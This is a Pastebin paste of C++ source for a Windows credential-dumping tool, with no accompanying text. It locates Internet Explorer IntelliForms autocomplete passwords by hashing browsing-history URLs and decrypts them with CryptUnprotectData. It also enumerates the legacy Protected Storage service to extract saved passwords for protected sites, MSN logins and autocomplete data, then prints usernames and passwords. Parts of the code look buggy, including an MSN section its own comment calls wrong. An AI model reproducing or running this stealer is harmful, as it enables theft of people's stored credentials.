Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <windows.h>
- #include <UrlHist.h>
- #include <shlobj.h>
- #include <stdio.h>
- #include <wincrypt.h>
- #include <tchar.h>
- #define UrlHistoryNum 5000
- #define MAX_VALUE_NAME 1024
- #import "pstorec.dll" no_namespace
- #pragma comment(lib, "Crypt32.lib")
- void EnumPStorage();
- void DecryptIEAutoCompletePwd();
- typedef HRESULT (WINAPI *FPPStoreCreateInstance)(IPStore **, DWORD, DWORD, DWORD);
- WCHAR *URL[UrlHistoryNum];
- int main()
- {
- EnumPStorage();
- DecryptIEAutoCompletePwd();
- return 0;
- }
- int EnumUrls()
- {
- IUrlHistoryStg2* pUrlHistoryStg2 = NULL;
- HRESULT hRes;
- DWORD idx = 0;
- CoInitialize(NULL);
- hRes = CoCreateInstance(CLSID_CUrlHistory, NULL, CLSCTX_INPROC_SERVER, IID_IUrlHistoryStg2, (void **)&pUrlHistoryStg2);
- if (!FAILED(hRes))
- {
- IEnumSTATURL* pEnumURL;
- hRes = pUrlHistoryStg2->EnumUrls(&pEnumURL);
- if (!FAILED(hRes))
- {
- STATURL suURL;
- DWORD pceltFetched;
- suURL.cbSize = sizeof(suURL);
- for (idx = 0; (idx < UrlHistoryNum) && (pEnumURL->Next(1, &suURL, &pceltFetched) == S_OK); ++idx)
- {
- if (suURL.pwcsUrl != NULL)
- {
- WCHAR *p = NULL;
- DWORD dwLen = 2 * (wcslen(suURL.pwcsUrl) + 1);
- if ((p = wcschr(suURL.pwcsUrl, '?')) != NULL)
- *p = 0;
- URL[idx] = new WCHAR[dwLen];
- _wcslwr_s(suURL.pwcsUrl, wcslen(suURL.pwcsUrl) + 1);
- wcscpy_s(URL[idx], dwLen, suURL.pwcsUrl);
- }
- }
- pEnumURL->Release();
- }
- pUrlHistoryStg2->Release();
- }
- CoUninitialize();
- return idx;
- }
- void GetURLHashString(DWORD idx, TCHAR *szHash, DWORD dwLen)
- {
- *szHash = 0;
- HCRYPTPROV hProv = NULL;
- HCRYPTHASH hHash = NULL;
- if (CryptAcquireContext(&hProv, 0, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
- {
- if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
- {
- if (CryptHashData(hHash, (BYTE *)(URL[idx]), 2 * (wcslen(URL[idx]) + 1), 0))
- {
- DWORD dwHashLen = 20;
- BYTE Buffer[20];
- if (CryptGetHashParam(hHash, HP_HASHVAL, Buffer, &dwHashLen, 0))
- {
- DWORD i;
- BYTE tail = 0;
- for (i = 0; i < 20; ++i)
- {
- tail += Buffer[i];
- wsprintf(szHash + 2 * i, TEXT("%02X"), Buffer[i]);
- }
- wsprintf(szHash + 2 * i, TEXT("%02X"), tail);
- }
- }
- CryptDestroyHash(hHash);
- }
- CryptReleaseContext(hProv, 0);
- }
- }
- void DecryptIEAutoCompletePwd()
- {
- TCHAR szIEStorageKey[] = TEXT("Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2");
- TCHAR szUrlHash[MAX_VALUE_NAME];
- HKEY hKey;
- TCHAR achValue[MAX_VALUE_NAME];
- DWORD cchValue = MAX_VALUE_NAME;
- DWORD dwUrl;
- DWORD i = 0, j = 0;
- DWORD dwType;
- DWORD BufferLength;
- BYTE *Buffer;
- dwUrl = EnumUrls();
- if (ERROR_SUCCESS != RegOpenKeyEx(HKEY_CURRENT_USER, szIEStorageKey, 0, KEY_QUERY_VALUE, &hKey))
- return;
- while (ERROR_NO_MORE_ITEMS != RegEnumValue(hKey, i, achValue, &cchValue, NULL, NULL, NULL, NULL))
- {
- for (j = 0; j < dwUrl; ++j)
- {
- GetURLHashString(j, szUrlHash, sizeof(szUrlHash));
- if (lstrcmp(szUrlHash, achValue) == 0)
- {
- RegQueryValueEx(hKey, achValue, 0, &dwType, 0, &BufferLength);
- Buffer = new BYTE[BufferLength];
- if (RegQueryValueEx(hKey, achValue, 0, &dwType, Buffer, &BufferLength) == ERROR_SUCCESS)
- {
- DATA_BLOB DataIn;
- DATA_BLOB DataOut;
- DATA_BLOB OptionalEntropy;
- DataIn.pbData = Buffer;
- DataIn.cbData = BufferLength;
- OptionalEntropy.pbData = (BYTE *)URL[j];
- OptionalEntropy.cbData = 2 * (wcslen(URL[j]) + 1);
- if (CryptUnprotectData(&DataIn, 0, &OptionalEntropy, NULL, NULL, 1, &DataOut))
- {
- DWORD dwHeaderSize = *((LPDWORD)(DataOut.pbData));
- DWORD dwSecretInfoSize = *((LPDWORD)(DataOut.pbData + 4));
- DWORD dwTotalSecrects = *((LPDWORD)(DataOut.pbData + 20)) / 2;
- LPBYTE lpSection = DataOut.pbData + 36;
- LPBYTE lpData = DataOut.pbData + dwHeaderSize + dwSecretInfoSize;
- if (DataOut.cbData < 36)
- continue;
- while(dwTotalSecrects--)
- {
- WCHAR *wstrUserName, *wstrPassword;
- wstrUserName = (WCHAR *)(lpData + *((LPDWORD)lpSection));
- lpSection += 16;
- wstrPassword = (WCHAR *)(lpData + *((LPDWORD)lpSection));
- printf("%S:\n{\n\tUsername: %S\n\tPassword: %S\n}\n", URL[j], wstrUserName, wstrPassword);
- lpSection += 16;
- }
- LocalFree(DataOut.pbData);
- }
- }
- delete []Buffer;
- break;
- }
- }
- i++;
- cchValue = MAX_VALUE_NAME;
- }
- RegCloseKey(hKey);
- }
- void EnumPStorage()
- {
- IPStorePtr PStore;
- IEnumPStoreTypesPtr EnumPStoreTypes;
- FPPStoreCreateInstance fpPStoreCreateInstance;
- HMODULE hModule = LoadLibrary(TEXT("pstorec.dll"));
- fpPStoreCreateInstance = (FPPStoreCreateInstance)GetProcAddress(hModule, "PStoreCreateInstance");
- fpPStoreCreateInstance(&PStore, 0, 0, 0);
- HRESULT hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes);
- if (!FAILED(hRes))
- {
- GUID TypeGUID;
- TCHAR szItemGUID[50];
- TCHAR szItemName[512];
- TCHAR szItemData[512];
- while (EnumPStoreTypes->raw_Next(1, &TypeGUID, 0) == S_OK)
- {
- IEnumPStoreTypesPtr EnumPStoreSubTypes;
- GUID SubTypeGUID;
- wsprintf(szItemGUID, TEXT("%x"), TypeGUID);
- PStore->EnumSubtypes(0, &TypeGUID, 0, &EnumPStoreSubTypes);
- while (EnumPStoreSubTypes->raw_Next(1, &SubTypeGUID, 0) == S_OK)
- {
- IEnumPStoreItemsPtr spEnumItems;
- LPWSTR itemName;
- PStore->EnumItems(0, &TypeGUID, &SubTypeGUID, 0, &spEnumItems);
- while (spEnumItems->raw_Next(1, &itemName, 0) == S_OK)
- {
- DWORD cbData = 0;
- unsigned char *lpString = NULL;
- TCHAR checkingData[200];
- _PST_PROMPTINFO *lPSTInfo = NULL;
- wsprintf(szItemName, TEXT("%ws"), itemName);
- PStore->ReadItem(0, &TypeGUID, &SubTypeGUID, itemName, &cbData, &lpString, lPSTInfo, 0);
- if (strlen((char *)lpString) < cbData - 1)
- {
- DWORD i = 0, j = 0;
- for (i = 0; i < cbData; i += 2, ++j)
- {
- if (lpString[i] == 0)
- szItemData[j] = ',';
- else
- szItemData[j] = lpString[i];
- }
- szItemData[j - 1] = 0;
- }
- else
- wsprintf(szItemData, TEXT("%s"), lpString);
- lstrcmp(szItemGUID, TEXT("220d5cc1"));
- // IE:Password-Protected sites
- if (lstrcmp(szItemGUID, TEXT("5e7e8100")) == 0)
- {
- if (_tcsstr(szItemData, TEXT(":")) != 0)
- {
- lstrcpy(checkingData, _tcsstr(szItemData, TEXT(":")) + 1);
- *(_tcsstr(szItemData, TEXT(":"))) = 0;
- }
- printf("%-50ws %-20ws %-15s %-15ws\n", szItemName, "PW-protected sites", szItemData, checkingData);
- }
- // msn
- if (lstrcmp(szItemGUID, TEXT("b9819c52")) == 0)
- {
- TCHAR msnid[100];
- TCHAR msnpass[100];
- DWORD i = 0, j = 0;
- for (i = 0; i < cbData; i += 2)
- {
- if (lpString[i] == 0)
- {
- szItemData[j] = ',';
- ++j;
- }
- else
- {
- if (IsCharAlphaNumeric(lpString[i]) || lpString[i] == '@' || lpString[i] == '.' || lpString[i] == '_')
- {
- szItemData[j] = lpString[i];
- ++j;
- }
- }
- }
- szItemData[j - 1] = 0;
- TCHAR *p = szItemData +2;
- for (i = 0; i < lpString[4]; ++i)
- {
- lstrcpy(msnid, p + 1);
- if (_tcsstr(msnid, TEXT(",")) != 0)
- *(_tcsstr(msnid, TEXT(","))) = 0;
- if (_tcsstr(p + 1, TEXT(",")) != 0)
- lstrcpy(msnpass, (_tcsstr(p + 1, TEXT(","))) + 2);
- if (_tcsstr(msnpass, TEXT(",")) != 0)
- *(_tcsstr(msnpass, TEXT(","))) = 0;
- // The binary code is wrong here
- p = _tcsstr(p + 1, TEXT(",")) + lstrlen(msnpass) + 9;
- }
- }
- // IE
- if (lstrcmp(szItemGUID, TEXT("e161255a")) == 0)
- {
- if (_tcsstr(szItemName, TEXT("StringIndex")) == 0)
- {
- if (_tcsstr(szItemName, TEXT(":String")) != 0)
- *(_tcsstr(szItemName, TEXT(":String"))) = 0;
- lstrcpyn(checkingData, szItemName, 8);
- if (_tcsstr(checkingData, TEXT("http:/")) == 0 && _tcsstr(checkingData, TEXT("https:/")) == 0)
- {
- // Nothing
- }
- else
- {
- lstrcpy(checkingData, szItemData);
- if (_tcsstr(checkingData, TEXT(",")) != 0)
- {
- lstrcpy(checkingData, _tcsstr(szItemData, TEXT(",")) + 1);
- *(_tcsstr(szItemData, TEXT(","))) = 0;
- }
- printf("%-50ws %-20ws %-15ws %-15ws\n", szItemName, TEXT("Auto complete"), szItemData, checkingData);
- }
- }
- }
- ZeroMemory(szItemName, sizeof(szItemName));
- ZeroMemory(szItemData, sizeof(szItemData));
- }
- //if (spEnumItems != NULL)
- //spEnumItems->Release();
- }
- //if (EnumPStoreSubTypes != NULL)
- //EnumPStoreSubTypes->Release();
- }
- //if (EnumPStoreTypes != NULL)
- //EnumPStoreTypes->Release();
- }
- //if (PStore != NULL)
- //PStore->Release();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement